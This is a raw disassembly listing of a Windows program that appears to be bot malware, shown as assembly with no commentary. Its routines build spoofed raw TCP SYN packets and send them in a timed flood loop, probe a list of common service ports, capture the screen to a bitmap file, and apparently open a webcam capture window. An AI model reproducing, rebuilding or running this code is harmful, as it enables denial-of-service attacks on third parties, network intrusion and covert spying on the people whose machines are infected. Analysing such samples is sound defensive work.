loc_414A4D: ; CODE XREF: sub_414746+39�j
; sub_414746+94�j
cmp [ebp+arg_20C], edi
jnz short loc_414A75
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_414A75: ; CODE XREF: sub_414746+30D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414A7C: ; CODE XREF: sub_414746+28B�j
push [ebp+var_4]
push esi
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
push offset unk_43661C
jmp short loc_414A3E
sub_414746 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A92 proc near ; DATA XREF: sub_401ACD+6362�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
call sub_41B779
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call sub_41B779
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call ds:dword_4CB694 ; inet_addr
push eax
call sub_414C2F
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset unk_4367F8
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414B27
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409A73
add esp, 14h
loc_414B27: ; CODE XREF: sub_414A92+73�j
lea eax, [ebp+var_414]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_414A92 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B46 proc near ; CODE XREF: sub_414C2F+194�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_414B6F
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427214 ; connect
jmp loc_414C2B
; ---------------------------------------------------------------------------
loc_414B6F: ; CODE XREF: sub_414B46+13�j
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [ebp+var_8], edi
call dword_4271F8 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4CB5FC ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call ds:dword_4CB63C ; select
test eax, eax
jnz short loc_414BD3
or eax, 0FFFFFFFFh
jmp short loc_414C2B
; ---------------------------------------------------------------------------
loc_414BD3: ; CODE XREF: sub_414B46+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_414BDE
loc_414BDA: ; CODE XREF: sub_414B46+B8�j
; sub_414B46+DC�j
mov eax, edi
jmp short loc_414C2B
; ---------------------------------------------------------------------------
loc_414BDE: ; CODE XREF: sub_414B46+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426756 ; __WSAFDIsSet
test eax, eax
jnz short loc_414C00
lea eax, [ebp+var_210]
push eax
push esi
call sub_426756 ; __WSAFDIsSet
test eax, eax
jz short loc_414BDA
loc_414C00: ; CODE XREF: sub_414B46+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call dword_4271E0 ; getsockopt
cmp eax, edi
jz short loc_414BDA
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_414C2B: ; CODE XREF: sub_414B46+24�j
; sub_414B46+8B�j ...
pop edi
pop esi
leave
retn
sub_414B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C2F proc near ; CODE XREF: sub_414A92+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
push 1
pop eax
xor ebx, ebx
push eax
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], eax
call dword_427208 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov ds:dword_4CEE78, eax
call ds:dword_4CB634 ; setsockopt
mov esi, dword_4270A8
call esi ; GetTickCount
push eax
call sub_41B8D8
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_10], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_414D75: ; CODE XREF: sub_414C2F+1C1�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, word ptr [ebp+eax+var_8C]
push eax
call ds:dword_4CB654 ; htons
push ebx
push 1
push 2
mov [ebp+var_9A], ax
call ds:dword_4CB6D4 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_C], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_414B46
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call ds:dword_4CB6EC ; closesocket
cmp [ebp+var_8], ebx
jnz short loc_414DE8
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_414DE8: ; CODE XREF: sub_414C2F+1AB�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_414D75
mov edi, offset dword_4CEE7C
push offset asc_42D128 ; " "
push edi
call sub_41B886
pop ecx
pop ecx
call esi ; GetTickCount
mov [ebp+var_C], eax
lea eax, [ebp+var_10C]
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
loc_414E15: ; CODE XREF: sub_414C2F+23C�j
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_414E6D
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, ebx
jz short loc_414E46
push eax
push edi
push offset aSD ; "%s%d "
push edi
mov [ebp+var_10], eax
call sub_41B886
add esp, 10h
jmp short loc_414E60
; ---------------------------------------------------------------------------
loc_414E46: ; CODE XREF: sub_414C2F+200�j
push 0FFFFh
push ebx
call sub_418685
pop ecx
pop ecx
push eax
call ds:dword_4CB654 ; htons
movzx eax, ax
mov [ebp+var_10], eax
loc_414E60: ; CODE XREF: sub_414C2F+215�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 1Ch
jl short loc_414E15
loc_414E6D: ; CODE XREF: sub_414C2F+1F7�j
; sub_414C2F+477�j
push 28h
push ebx
push offset byte_4CEE18
call sub_41B590
mov esi, 0FFFFh
mov ds:byte_4CEE18, 45h
push esi
push 400h
mov ds:byte_4CEE21, 6
mov ds:byte_4CEE19, 8
call sub_418685
add esp, 14h
push eax
call ds:dword_4CB654 ; htons
push 28h
mov ds:word_4CEE1C, ax
call ds:dword_4CB654 ; htons
or ds:byte_4CEE20, 0FFh
cmp ds:dword_4CEE08, ebx
mov ds:word_4CEE1A, ax
mov ds:word_4CEE1E, bx
jnz short loc_414EED
push 0FFFEh
push 1
call sub_418685
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
shl eax, 10h
and ecx, esi
or eax, ecx
jmp short loc_414EF8
; ---------------------------------------------------------------------------
loc_414EED: ; CODE XREF: sub_414C2F+2A2�j
push offset dword_4CE7E8
call ds:dword_4CB694 ; inet_addr
loc_414EF8: ; CODE XREF: sub_414C2F+2BC�j
mov ds:dword_4CEE24, eax
mov eax, [ebp+arg_0]
push 4000h
mov ds:dword_4CEE28, eax
mov ds:byte_4CEE39, bl
call ds:dword_4CB654 ; htons
push esi
push ebx
mov ds:word_4CEE3A, ax
call sub_418685
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_418685
add esp, 10h
add edi, eax
push edi
call ds:dword_4CB650 ; htonl
mov ds:dword_4CEE30, eax
mov al, ds:byte_4CEE38
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov ds:byte_4CEE38, al
mov ax, word ptr [ebp+var_10]
mov ds:dword_4CEE34, ebx
mov ds:word_4CEE3E, bx
mov ds:word_4CEE2E, ax
mov ds:dword_4CEE54, edi
mov ds:byte_4CEE58, bl
mov ds:byte_4CEE59, 6
call ds:dword_4CB654 ; htons
mov ds:word_4CEE5A, ax
mov ax, ds:word_4CEE2E
mov ds:word_4CEE40, 2
mov ds:dword_4CEE44, edi
mov ds:word_4CEE42, ax
mov [ebp+var_4], ebx
jmp short loc_414FAE
; ---------------------------------------------------------------------------
loc_414FA9: ; CODE XREF: sub_414C2F+451�j
mov esi, 0FFFFh
loc_414FAE: ; CODE XREF: sub_414C2F+378�j
cmp [ebp+var_4], ebx
jnz short loc_414FE2
push esi
push ebx
call sub_418685
pop ecx
pop ecx
push eax
call ds:dword_4CB654 ; htons
mov ds:word_4CEE2C, ax
mov eax, ds:dword_4CEE24
mov ds:dword_4CEE50, eax
mov ds:byte_4CEE39, 2
mov ds:dword_4CEE34, ebx
jmp short loc_415001
; ---------------------------------------------------------------------------
loc_414FE2: ; CODE XREF: sub_414C2F+382�j
push esi
push ebx
mov ds:byte_4CEE39, 10h
call sub_418685
pop ecx
pop ecx
push eax
call ds:dword_4CB654 ; htons
movzx eax, ax
mov ds:dword_4CEE34, eax
loc_415001: ; CODE XREF: sub_414C2F+3B1�j
inc ds:word_4CEE1C
inc ds:dword_4CEE30
mov ax, ds:word_4CEE2E
push 5
pop ecx
mov esi, offset word_4CEE2C
mov edi, offset dword_4CEE5C
mov ds:word_4CEE22, bx
mov ds:word_4CEE3C, bx
push 14h
rep movsd
mov esi, offset byte_4CEE18
mov ds:word_4CEE42, ax
push esi
call sub_40AC69
push 20h
push offset dword_4CEE50
mov ds:word_4CEE22, ax
call sub_40AC69
add esp, 10h
mov ds:word_4CEE3C, ax
push 10h
push offset word_4CEE40
push ebx
push 28h
push esi
push ds:dword_4CEE78
call ds:dword_4CB6B8 ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_414FA9
call dword_4270A8 ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_4150AB
push [ebp+arg_8]
call dword_427078 ; Sleep
jmp loc_414E6D
; ---------------------------------------------------------------------------
loc_4150AB: ; CODE XREF: sub_414C2F+46C�j
pop edi
pop esi
mov eax, offset dword_4CEE7C
pop ebx
leave
retn
sub_414C2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4150B5 proc near ; CODE XREF: sub_401ACD+7200�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43D810
mov edi, 0B8h
loc_4150C9: ; CODE XREF: sub_4150B5+33�j
cmp byte ptr [esi], 0
jz short loc_4150EC
push [ebp+arg_0]
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_4150EC
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_43E390
jl short loc_4150C9
jmp short loc_41512E
; ---------------------------------------------------------------------------
loc_4150EC: ; CODE XREF: sub_4150B5+17�j
; sub_4150B5+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_43D810[esi]
push ebx
call sub_41B590
push 17h
push [ebp+arg_0]
push ebx
call sub_41B5F0
push 9Fh
lea eax, dword_43D828[esi]
push [ebp+arg_4]
push eax
call sub_41B5F0
add esp, 24h
inc dword_4294D4
pop ebx
loc_41512E: ; CODE XREF: sub_4150B5+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_4150B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415135 proc near ; CODE XREF: sub_401ACD+28DE�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_436840
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
xor edi, edi
mov esi, offset dword_43D810
loc_41515F: ; CODE XREF: sub_415135+72�j
cmp byte ptr [esi], 0
jz short loc_41519A
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_43682C
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41B980
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 2Ch
loc_41519A: ; CODE XREF: sub_415135+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_43E390
jl short loc_41515F
pop edi
pop esi
leave
retn
sub_415135 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4151AD proc near ; CODE XREF: sub_401221+384�p
; sub_401221+408�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call dword_42712C ; GetLocalTime
mov ebx, offset dword_4D327C
mov edi, 80h
mov esi, offset dword_4CF27C
loc_4151CF: ; CODE XREF: sub_4151AD+3D�j
cmp byte ptr [ebx], 0
jz short loc_4151E6
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_41B5F0
add esp, 0Ch
loc_4151E6: ; CODE XREF: sub_4151AD+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_4151CF
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41B980
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_4151AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415221 proc near ; CODE XREF: sub_4017ED+F7�p
; sub_401ACD:loc_402077�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41C190
lea eax, [ebp+var_80]
push eax
call sub_4151AD
add esp, 14h
leave
retn
sub_415221 endp
; =============== S U B R O U T I N E =======================================
sub_41524D proc near ; CODE XREF: sub_401ACD+27D5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_4CF27C
xor ecx, ecx
loc_415254: ; CODE XREF: sub_41524D+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_4D327C
jl short loc_415254
cmp [esp+arg_C], ecx
jnz short loc_415282
push ecx
push [esp+4+arg_8]
push offset dword_43688C
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_409A73
add esp, 14h
loc_415282: ; CODE XREF: sub_41524D+19�j
push offset dword_436878
call sub_4151AD
pop ecx
retn
sub_41524D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41528E proc near ; DATA XREF: sub_401ACD+2888�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_4152E1
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_4368BC
push eax
push [ebp+var_11C]
call sub_409A73
add esp, 14h
loc_4152E1: ; CODE XREF: sub_41528E+33�j
cmp [ebp+var_98], 0
jz short loc_415301
lea eax, [ebp+var_98]
push eax
call sub_41B779
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415301
mov [ebp+var_8], eax
loc_415301: ; CODE XREF: sub_41528E+5A�j
; sub_41528E+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_4CF27C
loc_41530A: ; CODE XREF: sub_41528E+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415364
cmp byte ptr [esi], 0
jz short loc_415353
cmp [ebp+var_98], 0
jz short loc_415339
cmp [ebp+var_4], 0
jnz short loc_415339
lea eax, [ebp+var_98]
push eax
push esi
call sub_418087
pop ecx
test eax, eax
pop ecx
jz short loc_415353
loc_415339: ; CODE XREF: sub_41528E+90�j
; sub_41528E+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_409A73
add esp, 14h
loc_415353: ; CODE XREF: sub_41528E+87�j
; sub_41528E+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_4D327C
jl short loc_41530A
loc_415364: ; CODE XREF: sub_41528E+82�j
lea eax, [ebp+var_31C]
push offset dword_4368A0
push eax
call sub_41B886
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_41539E
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_409A73
add esp, 14h
loc_41539E: ; CODE XREF: sub_41528E+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_4151AD
push [ebp+var_18]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_41528E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153BD proc near ; CODE XREF: sub_401ACD+7350�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_4CB640 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_4155F1
push 8
push edi
call ds:dword_4CB65C ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call ds:dword_4CB65C ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call ds:dword_4CB65C ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_41541F
push 18h
push edi
call ds:dword_4CB65C ; GetDeviceCaps
mov ebx, 100h
jmp short loc_415421
; ---------------------------------------------------------------------------
loc_41541F: ; CODE XREF: sub_4153BD+50�j
xor ebx, ebx
loc_415421: ; CODE XREF: sub_4153BD+60�j
push edi
call ds:dword_4CB6A0 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_4155D6
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call ds:dword_4CB698 ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_4155E1
push eax
push [ebp+var_4]
call ds:dword_4CB524 ; SelectObject
cmp eax, esi
jz loc_4155E1
cmp eax, 0FFFFFFFFh
jz loc_4155E1
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call ds:dword_4CB69C ; BitBlt
test eax, eax
jz loc_4155E1
cmp ebx, esi
jz short loc_4154DE
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call ds:dword_4CB578 ; GetDIBColorTable
mov ebx, eax
loc_4154DE: ; CODE XREF: sub_4153BD+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call dword_4270EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_4155C1
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call dword_4270E0 ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call dword_4270E0 ; WriteFile
cmp ebx, esi
jz short loc_4155A3
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call dword_4270E0 ; WriteFile
loc_4155A3: ; CODE XREF: sub_4153BD+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call dword_4270E0 ; WriteFile
push [ebp+arg_0]
call dword_427068 ; CloseHandle
push 1
pop esi
loc_4155C1: ; CODE XREF: sub_4153BD+1A2�j
push [ebp+var_1C]
call ds:dword_4CB5B0 ; DeleteObject
push [ebp+var_4]
call ds:dword_4CB510 ; DeleteDC
mov edi, [ebp+var_20]
loc_4155D6: ; CODE XREF: sub_4153BD+70�j
push edi
call ds:dword_4CB510 ; DeleteDC
mov eax, esi
jmp short loc_4155F3
; ---------------------------------------------------------------------------
loc_4155E1: ; CODE XREF: sub_4153BD+C7�j
; sub_4153BD+D9�j ...
push edi
call ds:dword_4CB510 ; DeleteDC
push [ebp+var_4]
call ds:dword_4CB510 ; DeleteDC
loc_4155F1: ; CODE XREF: sub_4153BD+23�j
xor eax, eax
loc_4155F3: ; CODE XREF: sub_4153BD+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_4153BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155F8 proc near ; CODE XREF: sub_401ACD+7477�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_4D3280
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_4CB5A4
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_415636
mov eax, esi
jmp loc_4157EC
; ---------------------------------------------------------------------------
loc_415636: ; CODE XREF: sub_4155F8+35�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_415653
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4CB6B0 ; SendMessageA
jmp short loc_415655
; ---------------------------------------------------------------------------
loc_415653: ; CODE XREF: sub_4155F8+47�j
xor eax, eax
loc_415655: ; CODE XREF: sub_4155F8+59�j
cmp eax, ebx
jnz short loc_415660
loc_415659: ; CODE XREF: sub_4155F8+88�j
; sub_4155F8+BC�j
mov ebx, esi
jmp loc_4157E1
; ---------------------------------------------------------------------------
loc_415660: ; CODE XREF: sub_4155F8+5F�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_41567D
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_41567D: ; CODE XREF: sub_4155F8+71�j
cmp [ebp+var_20], ebx
jz short loc_415659
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_4156A3
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_4156A6
; ---------------------------------------------------------------------------
loc_4156A3: ; CODE XREF: sub_4155F8+98�j
mov [ebp+arg_4], ebx
loc_4156A6: ; CODE XREF: sub_4155F8+A9�j
push [ebp+arg_4]
call sub_41B4D5
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_415659
push [ebp+arg_4]
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, ebx
